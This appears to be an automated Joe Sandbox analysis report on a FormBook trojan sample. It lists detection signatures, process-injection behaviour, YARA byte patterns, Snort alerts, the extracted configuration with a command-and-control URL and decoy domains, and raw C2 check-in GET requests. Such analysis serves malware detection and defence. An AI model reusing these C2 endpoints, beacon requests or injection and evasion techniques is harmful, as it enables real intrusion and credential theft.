Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gZU26RjMUU

Overview

General Information

Sample Name:gZU26RjMUU (renamed file extension from none to exe)
Analysis ID:639420
MD5:5daed332426c66a3852518126bc49dfe
SHA1:1669f6cebdc4daae7f7f7391bb62ac74bad5ef00
SHA256:12fd506bab09a036a69b32535df6392d533a5ad8112c8b7bf287647f8c032bb0
Tags:32exeFormbooktrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • gZU26RjMUU.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\gZU26RjMUU.exe" MD5: 5DAED332426C66A3852518126BC49DFE)
    • cvtres.exe (PID: 4644 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)
      • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 4932 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6672 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.cvtres.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.cvtres.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.cvtres.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        3.2.cvtres.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.cvtres.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5162.241.253.23149854802031453 06/05/22-13:05:41.704788
          SID:2031453
          Source Port:49854
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.241.253.23149854802031412 06/05/22-13:05:41.704788
          SID:2031412
          Source Port:49854
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.537.187.131.15049950802031453 06/05/22-13:07:36.511560
          SID:2031453
          Source Port:49950
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.562.149.128.4049944802031453 06/05/22-13:07:05.906967
          SID:2031453
          Source Port:49944
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5203.170.80.25049943802031449 06/05/22-13:06:55.560019
          SID:2031449
          Source Port:49943
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.537.187.131.15049950802031449 06/05/22-13:07:36.511560
          SID:2031449
          Source Port:49950
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5203.170.80.25049943802031412 06/05/22-13:06:55.560019
          SID:2031412
          Source Port:49943
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.562.149.128.4049944802031412 06/05/22-13:07:05.906967
          SID:2031412
          Source Port:49944
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.537.187.131.15049950802031412 06/05/22-13:07:36.511560
          SID:2031412
          Source Port:49950
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5162.241.253.23149854802031449 06/05/22-13:05:41.704788
          SID:2031449
          Source Port:49854
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5203.170.80.25049943802031453 06/05/22-13:06:55.560019
          SID:2031453
          Source Port:49943
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.562.149.128.4049944802031449 06/05/22-13:07:05.906967
          SID:2031449
          Source Port:49944
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
          Multi AV Scanner detection for submitted file
          Source: gZU26RjMUU.exeVirustotal: Detection: 61%Perma Link
          Source: gZU26RjMUU.exeMetadefender: Detection: 22%Perma Link
          Source: gZU26RjMUU.exeReversingLabs: Detection: 76%
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.american-atlantic.net/ocgr/?1bEX=RCN0VIpNVc3o/0Xt/AQqQ/q9rwjWgBzqDKIEKCgy7ZwX9axoT0DyuUXrxj1X0+Rk7knz&8p=qVwdVxLX0Avira URL Cloud: Label: malware
          Source: http://www.mentalnayaarifmetika.online/ocgr/?1bEX=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJicG73GMn4IC&8p=qVwdVxLX0Avira URL Cloud: Label: malware
          Source: http://www.skb-cabinet.com/ocgr/?1bEX=aM4AR/Ukf7mSvEjk0rZEh8zH1+Y6GAFwXtGMYQcNHcG0GsWo/Wmk7XSmVo+6tFFOpJhc&8p=qVwdVxLX0Avira URL Cloud: Label: malware
          Source: http://www.14offresimportantes.com/ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/fu7sDLzfFUskF5Y&D8=x2Ml3P6pAvira URL Cloud: Label: malware
          Source: http://www.ccav11.xyz/ocgr/?1bEX=iHGDCwWI53HcfS+QocK4h8/yIB8fTb9A2eAWw2qT3wOwDe1V57PTmBmkxx0888TI8Tz7&8p=qVwdVxLX0Avira URL Cloud: Label: phishing
          Source: http://www.nagpurmandarin.com/ocgr/?1bEX=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+g37Dk2fKSc&D8=x2Ml3P6pAvira URL Cloud: Label: malware
          Source: http://www.tahnforest.com/ocgr/?1bEX=kkcvVq01iw48hCQBW4MaTtaHwAG6gu+AbY/89EqN09znnDW7xajgziFbmfLdfE+4DaO2&8p=qVwdVxLX0Avira URL Cloud: Label: malware
          Source: www.mentalnayaarifmetika.online/ocgr/Avira URL Cloud: Label: malware
          Source: http://www.exceedrigging.online/ocgr/?8p=qVwdVxLX0&1bEX=lpHABYYuY9cv3qxwBx7M5sV/ehU3dY7dp0OhYiYvhJ7rkfr4y7gNIHxTi8LWiO7UdxYHAvira URL Cloud: Label: malware
          Source: http://www.tubesing.com/ocgr/?8p=qVwdVxLX0&1bEX=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4WPL0DBPwKxAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: ageofcryptos.comVirustotal: Detection: 9%Perma Link
          Source: nagpurmandarin.comVirustotal: Detection: 12%Perma Link
          Source: tubesing.comVirustotal: Detection: 9%Perma Link
          Source: 14offresimportantes.comVirustotal: Detection: 10%Perma Link
          Machine Learning detection for sample
          Source: gZU26RjMUU.exeJoe Sandbox ML: detected
          Source: 3.0.cvtres.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.cvtres.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.cvtres.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.cvtres.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: gZU26RjMUU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: gZU26RjMUU.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: HJGFHFHJJKKGJ.pdb source: gZU26RjMUU.exe
          Source: Binary string: HJGFHFHJJKKGJ.pdbBSJB source: gZU26RjMUU.exe
          Source: Binary string: wntdll.pdbUGP source: cvtres.exe, 00000003.00000002.506066214.000000000569F000.00000040.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000003.432775420.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000003.430645116.0000000005247000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.505885590.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.507623325.0000000004639000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: cvtres_clr.pdb source: rundll32.exe, 0000000B.00000002.949137822.0000000004D07000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: cvtres.exe, cvtres.exe, 00000003.00000002.506066214.000000000569F000.00000040.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000003.432775420.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000003.430645116.0000000005247000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000B.00000003.505885590.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.507623325.0000000004639000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: cvtres.exe, 00000003.00000002.506971332.0000000007470000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: cvtres.exe, 00000003.00000002.506971332.0000000007470000.00000040.10000000.00040000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.68.16.179 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tubesing.com
          Source: C:\Windows\explorer.exeDomain query: www.travisjbogard.com
          Source: C:\Windows\explorer.exeNetwork Connect: 37.187.131.150 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tahnforest.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.253.231 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.edisson-bd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.201.101.222 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ageofcryptos.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.salahov.info
          Source: C:\Windows\explorer.exeNetwork Connect: 185.129.100.127 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.garglimited.com
          Source: C:\Windows\explorer.exeDomain query: www.exceedrigging.online
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.128.40 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.christineenergy.com
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 23.80.123.107 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tellgalpy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 43.240.146.175 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.american-atlantic.net
          Source: C:\Windows\explorer.exeDomain query: www.mentalnayaarifmetika.online
          Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.mftie.com
          Source: C:\Windows\explorer.exeDomain query: www.14offresimportantes.com
          Source: C:\Windows\explorer.exeDomain query: www.nagpurmandarin.com
          Source: C:\Windows\explorer.exeDomain query: www.engroconnect.net
          Source: C:\Windows\explorer.exeDomain query: www.muktobangla.xyz
          Source: C:\Windows\explorer.exeDomain query: www.ccav11.xyz
          Source: C:\Windows\explorer.exeDomain query: www.myamazonloan.net
          Source: C:\Windows\explorer.exeDomain query: www.skb-cabinet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.demetbatmaz.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49854 -> 162.241.253.231:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49854 -> 162.241.253.231:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49854 -> 162.241.253.231:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49943 -> 203.170.80.250:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49943 -> 203.170.80.250:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49943 -> 203.170.80.250:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49944 -> 62.149.128.40:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49944 -> 62.149.128.40:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49944 -> 62.149.128.40:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49950 -> 37.187.131.150:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49950 -> 37.187.131.150:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49950 -> 37.187.131.150:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.ccav11.xyz
          Source: C:\Windows\explorer.exeDNS query: www.muktobangla.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.mentalnayaarifmetika.online/ocgr/
          Source: Joe Sandbox ViewASN Name: UKRAINE-ASUA UKRAINE-ASUA
          Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
          Source: global trafficHTTP traffic detected: GET /ocgr/?8p=qVwdVxLX0&1bEX=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4WPL0DBPwKx HTTP/1.1Host: www.tubesing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=iHGDCwWI53HcfS+QocK4h8/yIB8fTb9A2eAWw2qT3wOwDe1V57PTmBmkxx0888TI8Tz7&8p=qVwdVxLX0 HTTP/1.1Host: www.ccav11.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=aM4AR/Ukf7mSvEjk0rZEh8zH1+Y6GAFwXtGMYQcNHcG0GsWo/Wmk7XSmVo+6tFFOpJhc&8p=qVwdVxLX0 HTTP/1.1Host: www.skb-cabinet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJicG73GMn4IC&8p=qVwdVxLX0 HTTP/1.1Host: www.mentalnayaarifmetika.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?8p=qVwdVxLX0&1bEX=lpHABYYuY9cv3qxwBx7M5sV/ehU3dY7dp0OhYiYvhJ7rkfr4y7gNIHxTi8LWiO7UdxYH HTTP/1.1Host: www.exceedrigging.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?8p=qVwdVxLX0&1bEX=/7YxqUa/79bB4G9Fxc9MRqyWJ3uHfA/Cqb47Ix/IG5ItadKvR99PpkoJqdMm4bEwSG/T HTTP/1.1Host: www.ageofcryptos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=kkcvVq01iw48hCQBW4MaTtaHwAG6gu+AbY/89EqN09znnDW7xajgziFbmfLdfE+4DaO2&8p=qVwdVxLX0 HTTP/1.1Host: www.tahnforest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?1bEX=RCN0VIpNVc3o/0Xt/AQqQ/q9rwjWgBzqDKIEKCgy7ZwX9axoT0DyuUXrxj1X0+Rk7knz&8p=qVwdVxLX0 HTTP/1.1Host: www.american-atlantic.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
